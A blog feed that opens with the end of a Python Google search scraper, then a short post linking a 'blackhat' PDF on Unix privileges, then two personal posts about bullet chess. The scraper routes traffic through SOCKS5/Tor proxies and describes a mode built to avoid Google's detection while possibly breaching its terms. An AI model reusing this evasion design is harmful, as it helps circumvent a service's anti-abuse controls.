<span class="n">li_g_results</span> <span class="o">=</span> <span class="n">dom</span><span class="o">.</span><span class="n">xpath</span><span class="p">(</span><span class="n">HTMLTranslator</span><span class="p">()</span><span class="o">.</span><span class="n">css_to_xpath</span><span class="p">(</span><span class="s1">'li.g'</span><span class="p">))</span>
<span class="n">links</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">e</span> <span class="ow">in</span> <span class="n">li_g_results</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">link_element</span> <span class="o">=</span> <span class="n">e</span><span class="o">.</span><span class="n">xpath</span><span class="p">(</span><span class="n">HTMLTranslator</span><span class="p">()</span><span class="o">.</span><span class="n">css_to_xpath</span><span class="p">(</span><span class="s1">'h3.r > a:first-child'</span><span class="p">))</span>
<span class="n">link</span> <span class="o">=</span> <span class="n">link_element</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'href'</span><span class="p">)</span>
<span class="n">title</span> <span class="o">=</span> <span class="n">link_element</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">text_content</span><span class="p">()</span>
<span class="k">except</span> <span class="ne">IndexError</span> <span class="k">as</span> <span class="n">err</span><span class="p">:</span>
<span class="n">logger</span><span class="o">.</span><span class="n">error</span><span class="p">(</span><span class="s1">'Error while parsing link/title element: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">err</span><span class="p">))</span>
<span class="k">continue</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">snippet_element</span> <span class="o">=</span> <span class="n">e</span><span class="o">.</span><span class="n">xpath</span><span class="p">(</span><span class="n">HTMLTranslator</span><span class="p">()</span><span class="o">.</span><span class="n">css_to_xpath</span><span class="p">(</span><span class="s1">'div.s > span.st'</span><span class="p">))</span>
<span class="n">snippet</span> <span class="o">=</span> <span class="n">snippet_element</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">text_content</span><span class="p">()</span>
<span class="k">except</span> <span class="ne">IndexError</span> <span class="k">as</span> <span class="n">err</span><span class="p">:</span>
<span class="n">logger</span><span class="o">.</span><span class="n">error</span><span class="p">(</span><span class="s1">'Error while parsing snippet element: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">err</span><span class="p">))</span>
<span class="k">continue</span>
<span class="n">links</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">Result</span><span class="p">(</span><span class="n">link_title</span><span class="o">=</span><span class="n">title</span><span class="p">,</span> <span class="n">link_url</span><span class="o">=</span><span class="n">link</span><span class="p">,</span> <span class="n">link_snippet</span><span class="o">=</span><span class="n">snippet</span><span class="p">))</span>
<span class="c1"># Catch further errors besides parsing errors that take shape as IndexErrors</span>
<span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">err</span><span class="p">:</span>
<span class="n">logger</span><span class="o">.</span><span class="n">error</span><span class="p">(</span><span class="s1">'Error in parsing result links: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">err</span><span class="p">))</span>
<span class="bp">self</span><span class="o">.</span><span class="n">SEARCH_RESULTS</span><span class="p">[</span><span class="s1">'results'</span><span class="p">]</span><span class="o">.</span><span class="n">extend</span><span class="p">(</span><span class="n">links</span><span class="p">)</span>
<span class="c1"># try to get the number of results for our search query</span>
<span class="k">try</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">SEARCH_RESULTS</span><span class="p">[</span><span class="s1">'num_results_for_kw'</span><span class="p">]</span> <span class="o">=</span>
<span class="n">dom</span><span class="o">.</span><span class="n">xpath</span><span class="p">(</span><span class="n">HTMLTranslator</span><span class="p">()</span><span class="o">.</span><span class="n">css_to_xpath</span><span class="p">(</span><span class="s1">'div#resultStats'</span><span class="p">))[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">text_content</span><span class="p">()</span>
<span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="n">logger</span><span class="o">.</span><span class="n">critical</span><span class="p">(</span><span class="n">e</span><span class="o">.</span><span class="n">msg</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">scrape</span><span class="p">(</span><span class="n">query</span><span class="p">,</span> <span class="n">num_results_per_page</span><span class="o">=</span><span class="mi">100</span><span class="p">,</span> <span class="n">num_pages</span><span class="o">=</span><span class="mi">1</span><span class="p">,</span> <span class="n">offset</span><span class="o">=</span><span class="mi">0</span><span class="p">):</span>
<span class="sd">"""Public API function to search for terms and return a list of results.</span>
<span class="sd"> arguments:</span>
<span class="sd"> query -- the search query. Can be whatever you want to crawl google for.</span>
<span class="sd"> Keyword arguments:</span>
<span class="sd"> num_results_per_page -- the number of results per page. Either 10, 25, 50 or 100.</span>
<span class="sd"> num_pages -- The number of pages to search for.</span>
<span class="sd"> offset -- specifies the offset to the page to begin searching.</span>
<span class="sd"> """</span>
<span class="n">threads</span> <span class="o">=</span> <span class="p">[</span><span class="n">GoogleScrape</span><span class="p">(</span><span class="n">query</span><span class="p">,</span> <span class="n">num_results_per_page</span><span class="p">,</span> <span class="n">i</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">offset</span><span class="p">,</span> <span class="n">num_pages</span> <span class="o">+</span> <span class="n">offset</span><span class="p">,</span> <span class="mi">1</span><span class="p">)]</span>
<span class="k">for</span> <span class="n">t</span> <span class="ow">in</span> <span class="n">threads</span><span class="p">:</span>
<span class="n">t</span><span class="o">.</span><span class="n">start</span><span class="p">()</span>
<span class="k">for</span> <span class="n">t</span> <span class="ow">in</span> <span class="n">threads</span><span class="p">:</span>
<span class="n">t</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="mf">3.0</span><span class="p">)</span>
<span class="k">return</span> <span class="p">[</span><span class="n">t</span><span class="o">.</span><span class="n">SEARCH_RESULTS</span> <span class="k">for</span> <span class="n">t</span> <span class="ow">in</span> <span class="n">threads</span><span class="p">]</span>
<span class="k">def</span> <span class="nf">deep_scrape</span><span class="p">(</span><span class="n">query</span><span class="p">):</span>
<span class="sd">"""Launches many different Google searches with different parameter combinations to maximize return of results.</span>
<span class="sd"> @param query: The query to search for.</span>
<span class="sd"> @return: All the result sets.</span>
<span class="sd"> """</span>
<span class="c1"># First obtain some synonyms for the search query</span>
<span class="c1"># For each proxy, run the scrapes</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">parser</span> <span class="o">=</span> <span class="n">argparse</span><span class="o">.</span><span class="n">ArgumentParser</span><span class="p">(</span><span class="n">prog</span><span class="o">=</span><span class="s1">'GoogleScraper'</span><span class="p">,</span> <span class="n">description</span><span class="o">=</span><span class="s1">'Scrapes the Google search engine'</span><span class="p">,</span>
<span class="n">epilog</span><span class="o">=</span><span class="s1">'This program might infringe Google TOS, so use at your own risk'</span><span class="p">)</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s1">'-q'</span><span class="p">,</span> <span class="s1">'--query'</span><span class="p">,</span> <span class="n">metavar</span><span class="o">=</span><span class="s1">'search_string'</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">action</span><span class="o">=</span><span class="s1">'store'</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s1">'query'</span><span class="p">,</span> <span class="n">required</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span>
<span class="n">help</span><span class="o">=</span><span class="s1">'The search query.'</span><span class="p">)</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s1">'-n'</span><span class="p">,</span> <span class="s1">'--num_results_per_page'</span><span class="p">,</span> <span class="n">metavar</span><span class="o">=</span><span class="s1">'number_of_results_per_page'</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">int</span><span class="p">,</span>
<span class="n">dest</span><span class="o">=</span><span class="s1">'num_results_per_page'</span><span class="p">,</span> <span class="n">action</span><span class="o">=</span><span class="s1">'store'</span><span class="p">,</span> <span class="n">default</span><span class="o">=</span><span class="mi">50</span><span class="p">,</span>
<span class="n">help</span><span class="o">=</span><span class="s1">'The number of results per page. Most be >= 100'</span><span class="p">)</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s1">'-p'</span><span class="p">,</span> <span class="s1">'--num_pages'</span><span class="p">,</span> <span class="n">metavar</span><span class="o">=</span><span class="s1">'num_of_pages'</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">int</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s1">'num_pages'</span><span class="p">,</span> <span class="n">action</span><span class="o">=</span><span class="s1">'store'</span><span class="p">,</span>
<span class="n">default</span><span class="o">=</span><span class="mi">1</span><span class="p">,</span>
<span class="n">help</span><span class="o">=</span><span class="s1">'The number of pages to search in. Each page is requested by a unique connection and if possible by a unique IP.'</span><span class="p">)</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s1">'--proxy'</span><span class="p">,</span> <span class="n">metavar</span><span class="o">=</span><span class="s1">'proxycredentials'</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s1">'proxy'</span><span class="p">,</span> <span class="n">action</span><span class="o">=</span><span class="s1">'store'</span><span class="p">,</span>
<span class="n">required</span><span class="o">=</span><span class="kc">False</span><span class="p">,</span> <span class="c1">#default=('127.0.0.1', 9050)</span>
<span class="n">help</span><span class="o">=</span><span class="s1">'A string such as "127.0.0.1:9050" specifying a single proxy server'</span><span class="p">)</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s1">'--proxy_file'</span><span class="p">,</span> <span class="n">metavar</span><span class="o">=</span><span class="s1">'proxyfile'</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s1">'proxy_file'</span><span class="p">,</span> <span class="n">action</span><span class="o">=</span><span class="s1">'store'</span><span class="p">,</span>
<span class="n">required</span><span class="o">=</span><span class="kc">False</span><span class="p">,</span> <span class="c1">#default='.proxies'</span>
<span class="n">help</span><span class="o">=</span><span class="s1">'A filename for a list of proxies (supported are HTTP PROXIES, SOCKS4/4a/5) with the following format: "Proxyprotocol (proxy_ip|proxy_host):Port</span><span class="se">\\</span><span class="s1">n"'</span><span class="p">)</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s1">'-x'</span><span class="p">,</span> <span class="s1">'--deep-scrape'</span><span class="p">,</span> <span class="n">action</span><span class="o">=</span><span class="s1">'store_true'</span><span class="p">,</span> <span class="n">default</span><span class="o">=</span><span class="kc">False</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s1">'Launches a wide range of parallel searches by modifying the search '</span>
<span class="s1">'query string with synonyms and by scraping with different Google search parameter combinations that might yield more unique '</span>
<span class="s1">'results. The algorithm is optimized for maximum of results for a specific keyword whilst trying avoid detection. This is the heart of GoogleScraper.'</span><span class="p">)</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s1">'--view'</span><span class="p">,</span> <span class="n">action</span><span class="o">=</span><span class="s1">'store_true'</span><span class="p">,</span> <span class="n">default</span><span class="o">=</span><span class="kc">False</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s2">"View the response in a default browser tab."</span>
<span class="s2">" Mainly for debug purposes. Works only when caching is enabled."</span><span class="p">)</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s1">'-v'</span><span class="p">,</span> <span class="s1">'--verbosity'</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">int</span><span class="p">,</span> <span class="n">default</span><span class="o">=</span><span class="mi">1</span><span class="p">,</span>
<span class="n">help</span><span class="o">=</span><span class="s2">"The verbosity of the output reporting for the found search results."</span><span class="p">)</span>
<span class="n">args</span> <span class="o">=</span> <span class="n">parser</span><span class="o">.</span><span class="n">parse_args</span><span class="p">()</span>
<span class="k">if</span> <span class="n">args</span><span class="o">.</span><span class="n">proxy_file</span><span class="p">:</span>
<span class="k">raise</span> <span class="ne">NotImplementedError</span><span class="p">(</span><span class="s1">'Coming soon.'</span><span class="p">)</span>
<span class="k">if</span> <span class="n">args</span><span class="o">.</span><span class="n">proxy</span><span class="p">:</span>
<span class="k">def</span> <span class="nf">create_connection</span><span class="p">(</span><span class="n">address</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="kc">None</span><span class="p">,</span> <span class="n">source_address</span><span class="o">=</span><span class="kc">None</span><span class="p">):</span>
<span class="n">sock</span> <span class="o">=</span> <span class="n">socks</span><span class="o">.</span><span class="n">socksocket</span><span class="p">()</span>
<span class="n">sock</span><span class="o">.</span><span class="n">connect</span><span class="p">(</span><span class="n">address</span><span class="p">)</span>
<span class="k">return</span> <span class="n">sock</span>
<span class="n">proxy_host</span><span class="p">,</span> <span class="n">proxy_port</span> <span class="o">=</span> <span class="n">args</span><span class="o">.</span><span class="n">proxy</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">':'</span><span class="p">)</span>
<span class="c1"># Patch the socket module</span>
<span class="n">socks</span><span class="o">.</span><span class="n">setdefaultproxy</span><span class="p">(</span><span class="n">socks</span><span class="o">.</span><span class="n">PROXY_TYPE_SOCKS5</span><span class="p">,</span> <span class="n">proxy_host</span><span class="p">,</span> <span class="nb">int</span><span class="p">(</span><span class="n">proxy_port</span><span class="p">),</span>
<span class="n">rdns</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span> <span class="c1"># rdns is by default on true. Never use rnds=False with TOR, otherwise you are screwed!</span>
<span class="n">socks</span><span class="o">.</span><span class="n">wrap_module</span><span class="p">(</span><span class="n">socket</span><span class="p">)</span>
<span class="n">socket</span><span class="o">.</span><span class="n">create_connection</span> <span class="o">=</span> <span class="n">create_connection</span>
<span class="k">if</span> <span class="n">args</span><span class="o">.</span><span class="n">deep_scrape</span><span class="p">:</span>
<span class="n">results</span> <span class="o">=</span> <span class="n">deep_scrape</span><span class="p">(</span><span class="n">args</span><span class="o">.</span><span class="n">query</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">results</span> <span class="o">=</span> <span class="n">scrape</span><span class="p">(</span><span class="n">args</span><span class="o">.</span><span class="n">query</span><span class="p">,</span> <span class="n">args</span><span class="o">.</span><span class="n">num_results_per_page</span><span class="p">,</span> <span class="n">args</span><span class="o">.</span><span class="n">num_pages</span><span class="p">)</span>
<span class="k">for</span> <span class="n">result</span> <span class="ow">in</span> <span class="n">results</span><span class="p">:</span>
<span class="n">logger</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s1">'</span><span class="si">{}</span><span class="s1"> links found! The search with the keyword "</span><span class="si">{}</span><span class="s1">" yielded the result:</span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span>
<span class="nb">len</span><span class="p">(</span><span class="n">result</span><span class="p">[</span><span class="s1">'results'</span><span class="p">]),</span> <span class="n">result</span><span class="p">[</span><span class="s1">'search_keyword'</span><span class="p">],</span> <span class="n">result</span><span class="p">[</span><span class="s1">'num_results_for_kw'</span><span class="p">]))</span>
<span class="k">if</span> <span class="n">args</span><span class="o">.</span><span class="n">view</span><span class="p">:</span>
<span class="kn">import</span> <span class="nn">webbrowser</span>
<span class="n">webbrowser</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="n">result</span><span class="p">[</span><span class="s1">'cache_file'</span><span class="p">])</span>
<span class="k">for</span> <span class="n">link_title</span><span class="p">,</span> <span class="n">link_snippet</span><span class="p">,</span> <span class="n">link_url</span> <span class="ow">in</span> <span class="n">result</span><span class="p">[</span><span class="s1">'results'</span><span class="p">]:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Link: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">urllib</span><span class="o">.</span><span class="n">parse</span><span class="o">.</span><span class="n">unquote</span><span class="p">(</span><span class="n">link_url</span><span class="o">.</span><span class="n">geturl</span><span class="p">())))</span>
<span class="k">if</span> <span class="n">args</span><span class="o">.</span><span class="n">verbosity</span> <span class="o">></span> <span class="mi">1</span><span class="p">:</span>
<span class="kn">import</span> <span class="nn">textwrap</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Title: </span><span class="se">\n</span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">textwrap</span><span class="o">.</span><span class="n">indent</span><span class="p">(</span><span class="s1">'</span><span class="se">\n</span><span class="s1">'</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">textwrap</span><span class="o">.</span><span class="n">wrap</span><span class="p">(</span><span class="n">link_title</span><span class="p">,</span> <span class="mi">50</span><span class="p">)),</span> <span class="s1">'</span><span class="se">\t</span><span class="s1">'</span><span class="p">)))</span>
<span class="nb">print</span><span class="p">(</span>
<span class="s1">'Description: </span><span class="se">\n</span><span class="si">{}</span><span class="se">\n</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">textwrap</span><span class="o">.</span><span class="n">indent</span><span class="p">(</span><span class="s1">'</span><span class="se">\n</span><span class="s1">'</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">textwrap</span><span class="o">.</span><span class="n">wrap</span><span class="p">(</span><span class="n">link_snippet</span><span class="p">,</span> <span class="mi">70</span><span class="p">)),</span> <span class="s1">'</span><span class="se">\t</span><span class="s1">'</span><span class="p">)))</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'*'</span> <span class="o">*</span> <span class="mi">70</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'*'</span> <span class="o">*</span> <span class="mi">70</span><span class="p">)</span>
</code></pre></div>
</td></tr></table>Linux/Unix privileges from a blackhats perspective2012-12-30T23:18:00+01:002012-12-30T23:18:00+01:00Nikolai Tschachertag:incolumitas.com,2012-12-30:/2012/12/30/linuxunix-privileges-from-a-blackhats-perspective/<p>Hey folks!</p>
<p>Had some difficulties understanding UNIX file permissions in all it's
variations and eternal predisposition to misuse as adminman! Made a
little PDF, the independent blog article will follow soon. It's just a
pain in the ass to format all that LibreOffice into a nice wordpress
format. Next time, I will just do it in plain ASCII 7 Bit style,
goddamnit...</p>
<p>Hell, it's time to read some phrack stuff again :)</p>
<p><strong>Download PDF here:</strong> <a href="/uploads/2012/12/blackhats_view.pdf">blackhats_view</a></p>Bullet chess challenge :)2012-11-26T15:01:00+01:002012-11-26T15:01:00+01:00Nikolai Tschachertag:incolumitas.com,2012-11-26:/2012/11/26/bullet-chess-challange/<p>I realised once more, that, when I excessively play bullet chess, I tend
to stagnate or my performance even goes down the tubes. The reason
behind this, I am assuming, the absence of defined goal or when I play
without thinking (as far as thinking in bullet chess is the legit word)
or other bad behaviour, as listening to music...</p>
<p>Therefore, I will try a little experiment: I play every day not more
than 10 bullet games. This is around 20 minutes of playing. But every
time I lose, I have to to 6 full and slow chin-ups. I'll play on
chess.com and my starting rating is right now <strong>1924</strong>, which actually
is pretty high for me. Nevertheless, my goal is to reach ELO 2050. My
all time highscore is <strong>1974. </strong>Let's go and breake some records...</p>
<p>Ok let the journey begin :)</p>
<ul>
<li>26.11.2012: <strong>1924 - 1896. </strong>Did around 30 chin-ups. Tired as hell.
Lost too many times :)</li>
<li>28.11.2012 <strong>1896 - 1903. </strong>Back in the 1900s. Did lot's of chin
ups. My game improved slightly, I think more and deeper. My speed is
still to slow...</li>
<li>29.11.2012 <strong>1903 - 1900. </strong>I am stagnating, I have the impression …</li></ul><p>I realised once more, that, when I excessively play bullet chess, I tend
to stagnate or my performance even goes down the tubes. The reason
behind this, I am assuming, the absence of defined goal or when I play
without thinking (as far as thinking in bullet chess is the legit word)
or other bad behaviour, as listening to music...</p>
<p>Therefore, I will try a little experiment: I play every day not more
than 10 bullet games. This is around 20 minutes of playing. But every
time I lose, I have to to 6 full and slow chin-ups. I'll play on
chess.com and my starting rating is right now <strong>1924</strong>, which actually
is pretty high for me. Nevertheless, my goal is to reach ELO 2050. My
all time highscore is <strong>1974. </strong>Let's go and breake some records...</p>
<p>Ok let the journey begin :)</p>
<ul>
<li>26.11.2012: <strong>1924 - 1896. </strong>Did around 30 chin-ups. Tired as hell.
Lost too many times :)</li>
<li>28.11.2012 <strong>1896 - 1903. </strong>Back in the 1900s. Did lot's of chin
ups. My game improved slightly, I think more and deeper. My speed is
still to slow...</li>
<li>29.11.2012 <strong>1903 - 1900. </strong>I am stagnating, I have the impression
that I still lack creativity and don't really want to play. My
motivation is weak, but I am ways more concentrated compared to
playing endless long sessions. 4 from 10 games were chin-ups. That
means 24 chin ups :)</li>
<li>30.11.2012<strong>1900 - 1888</strong>. What the fuck? I play excellent but
freaking slow :/</li>
<li>1.12.2012 <strong>1888 - 1926</strong>. It goes up and up :)</li>
<li>2.12.2012 <strong>1926 - 1945. </strong>Seems like I am back in the solid 1900s.
This rating is close to my all time high and I am looking forward to
make a new record and to fullfill my goal!</li>
<li>3.12.2012 <strong>1945 - 1865</strong>. Played like 50 games. That's the
punishment. That was this opponent who really made me angry. Next
time, I'll stick to the plan and won't get emotional. I shouldn't
play more than 10 games. Waaaaah !</li>
<li>4.12.2012 <strong>1865 - 1909. </strong>Hangled myself brutally back in the 1900s
with 2 wins against a 2200 elo player. Played my 10 games...</li>
<li>8.12.2012 <strong>1797 - 1825 </strong>Don't ask. At least I played today 10
games. 5 wins, 5 losts. I do now <code>5 * 10</code> pushups...</li>
<li>10.12.2012 <strong>1800 - 1847</strong></li>
<li>16.12.2012 <strong>1847 - 1823 </strong>Played 10 games...</li>
<li>18.12.2012 <strong>1800 - 2000 </strong>Hell yeah, I played at least 300 games
the last days and I finally achieved the freakin 2000 Elo. To be
honest, if I really tried I could crack my genuine goal of Elo 2050,
but it's just ways to risky that I suddently digress and get
unconcentrated and it begins all over. So I am stopping here. It's a
new all time record since I played bullet chess (now aproximately 5
years) and it's good like that. It's just too much time wasted ;)</li>
</ul>
<p>The message (not complete) I received on chess.com when I reached the
2000:</p>
<p>...</p>
<p><em>Congratulations </em><em>zardaxt</em><em> on achieving a high rating on Chess.com!
You are now among the strongest players on our site.</em></p>
<p>...</p>
<p>The challange ends with that...</p>Bullet Chess - A silly game?2012-11-05T20:37:00+01:002012-11-05T20:37:00+01:00Nikolai Tschachertag:incolumitas.com,2012-11-05:/2012/11/05/bullet-chess-a-silly-game/<p>I define bullet chess as games with one minute time for each
player. There are plenty of other definitions, but I think my
definition refers to the most common one. This article is definitely
worth a read and helps to understand my further
deliberations: <a href="http://en.wikipedia.org/wiki/Fast_chess">http://en.wikipedia.org/wiki/Fast_chess</a></p>
<p>Well, besides my enthusiasm for IT security, I have always been a bullet
chess player with myself worrying adictive feautures. It all began
around three or four years ago, when I realised that simply too much
people tend to use chess engines on online platform and in addition, I
was just to nervous and unwilled to calculate and think the average
(somehow boring long) length of a entire chess game. Bullet games came
perfect in this manner: It is almost impossible to cheat manually in
bullet games (of course you could write bots which directly interact
with the server through the underlining protocol - HTTP when you're
lucky, or some really badass proprietary one, when you have misfortune,
but I assume that's a rather low percentage). It turns out, that
my renunciation of the original purpose of chess; thinking deep and
beeing patient, turned my in a slightly better long …</p><p>I define bullet chess as games with one minute time for each
player. There are plenty of other definitions, but I think my
definition refers to the most common one. This article is definitely
worth a read and helps to understand my further
deliberations: <a href="http://en.wikipedia.org/wiki/Fast_chess">http://en.wikipedia.org/wiki/Fast_chess</a></p>
<p>Well, besides my enthusiasm for IT security, I have always been a bullet
chess player with myself worrying adictive feautures. It all began
around three or four years ago, when I realised that simply too much
people tend to use chess engines on online platform and in addition, I
was just to nervous and unwilled to calculate and think the average
(somehow boring long) length of a entire chess game. Bullet games came
perfect in this manner: It is almost impossible to cheat manually in
bullet games (of course you could write bots which directly interact
with the server through the underlining protocol - HTTP when you're
lucky, or some really badass proprietary one, when you have misfortune,
but I assume that's a rather low percentage). It turns out, that
my renunciation of the original purpose of chess; thinking deep and
beeing patient, turned my in a slightly better long time chess player,
but what is more important: It let me keep my fascination for this
highly complex and interesting game. Nevertheless, the increase of
tension and fun comes also to a high price, I mentioned before: Addictve
elements ;)</p>
<p>I played more than once a whole night and I guess that I played more
than 10 000 games over the last years. I saw people online with
astonishing 200 000 bullet games. Assuming this person was 10 years
on this platform (which indeed is a very long time) this would be 55
bullet chess games per day! This adds to (just a rough guess - supposing
a game is last a average 90 seconds) 1 hour and 20 minutes spend on
chess for every day for freakin 10 years! This sounds crazy but may
not be unrealistic. I played many times just against one player 80 games
without interruption. Just think about it: <code>80 * 90 seconds = 7200/3600
= 2 hours</code> of chess without any pause!</p>
<p>Although this might not be very healthy, there are lots of voices out
there which critize the nature and even raison être of bullet chess.
I'll list and argue against them, which finally, brings os to the
initial purpose of this blog post: Is bullet chess just a random, silly
game for players who suck at real chess?</p>
<h3>Prejudice 1. Bullet Chess is all about luck and moving figures</h3>
<p>randomly.</p>
<p>No, definitely not. While novice bullet chess players might judge it
this way, it changes rapidly if you improve. With 60 seconds on your
clock, there is plenty of time to mate your opponent. Of course the
general approach to attack and defense is modified. Bringing your king
into a safe position is essential; you just don't have the time to
figure out, if you might be able to defend him. This reveals a very
important property of being successful (at least up to a specific
degree) in this kind of chess:<br>
Intuition and strategy over knowing and thinking! It is for example
ways easier to play in a situition in which you don't have to care for<br>
potential mate threats, but otherwise would be lost in a longer game,
due to some disadvantes in figure constellation or positioning. This
works as long as you have enough power to generate new mate threats, but
as soon as your opponent can stop your attack he can just play very fast
towards figure exchange and run a peasant into a queen. If you run out
of threats and your opponent has three or 4 seconds left, this is
usually considered enough time to mate you.</p>
<p>And this brings us to the second fact: Better bullet chess players tend
to play stronger. This sounds stupid, but it isn't. Stronger isn't equal
to 'better' in bullet chess. Till a specific rating (I'd say as far as
ELO 1650), playing faster means playing better in bullet chess terms.
But if you cross this border, while your improvement process, the
trade-off of playing<br>
strong and fast switches to playing strong. You might have 40 seconds
left after 30 moves, but your ELO 2100 opponent has a indefendable mate
threat while 5 seconds remaining. Still owned...</p>
<p>Last but not least, you can disprove the above prejudice just like this:
On big online chess platforms, like chessbase, there are a wide range of
various strength classes of bullet players. Bullet players ELO rating,
who play often and are well trained, disperse around 1500-3000 ELO (at
least on chessbase), just like the equivalent players who just play
'real chess games'. If bullet was all about luck, why is the range so
big and diversified? Just because they move in differeing velocity?
(yeah, it's a rethorical question).</p>
<h3>Prejudice 2. Real chess players don't play bullet games</h3>
<p>There are even big official blitz campionships and a lot of
grandmasters play for fun and part time seriously blitz and bullet
games. It will never replace the original chess, but it has it's own
valid place.</p>
<h3>Prejudice 3. Mouse and high latency times make 'fair' games</h3>
<p>impossible</p>
<p>That's just nonsense. While the critisms are partially true for some
poorly programmed web platforms, these arguments aren't valid for the
more sophisticated, non browser based chess platforms like chessbase,
where you're able to make premoves, have super low latency times and
much benefits. A normal mouse is perfectly fine and you don't need to
invest money in special ones. I never understood the guys claiming
that I won because I possibly have the better mouse.</p>
<p>Despite everything said, I still have to admit that there is some kind
of hardware/configuration hurdle between novice or even average bullet
players and the advanced onces: You have to figure out some tricks and
shenanigans which give you advantages:</p>
<ul>
<li>Use premoves</li>
<li>When you're both really short on time (1 or 2 second before timeout)
and you still have a figure to sacrifce, do it while checking! Just
make the most spatial imparing check possible, so that the opponent
is forced to move and 'think'. Usually he's moving really fast some
random peasants and then he is forced to move his mouse the whole
way to the king, and, tadaaaa, you won on time!</li>
<li>Hands down: Bullet chess players are rude and emotional people,
mainly because it's such a enormous mental stressing game. So, if
you win on time, don't feel sorry about it! It's part of the game
configuration, and winning on time is like winning on check mate.
You were just better.</li>
<li>Check as often as you can. It steals time from your opponent.</li>
<li>Internalize openings.</li>
</ul>
<h3>Prejudice 4. Bullet chess is a silly game ;)</h3>
<p>I guess after you played it the first time, you very mentally so broken
that you became angry and blamed the game instead of yourself. It's a
hell of a thrilling, stressing and somehow insane game. It need sheer
unimaginable mental ressources, and not everyone can handel that! It's a
dead tough game, not a silly one, not ment for ramblers :D</p>
<h3>Prejudice 5. Bullet chess is bad, because it makes you a worse chess</h3>
<p>player</p>
<p>Often bullet chess is considered as a game which ruins your normal chess
skills (as you can see on the wikipedia article above, even by world
famous chess players support this opinion), because it animates you to
move quickly and don't spend (too much) time on positional and general
thinking. Chess is by all means not a game designed to play in a minute.
I would never say that. What I want to say instead is, that we have to
carefully distinguish between the 2 games. They aren't the same. You
also don't say that hall football is stupid and silly because it
misinterprets the rules of the well known football. They are two similar
games (both played with balls, several players and on grass), but have
different approaches on tactics and strategy. And if you want to become
successful in bullet chess, you need to be deadly concentrated, very
fast, and in my opintion the most important, you constantly need to have
a inner overview over the time!</p>
<p>Write me and I would love to play some games with you, recently, I
prefer <a href="http://chess.com" title="chess.com">chess.com</a>, and if you dare to
challange a 1930 ELO player (of course just on bullet ;) ), I'll wait
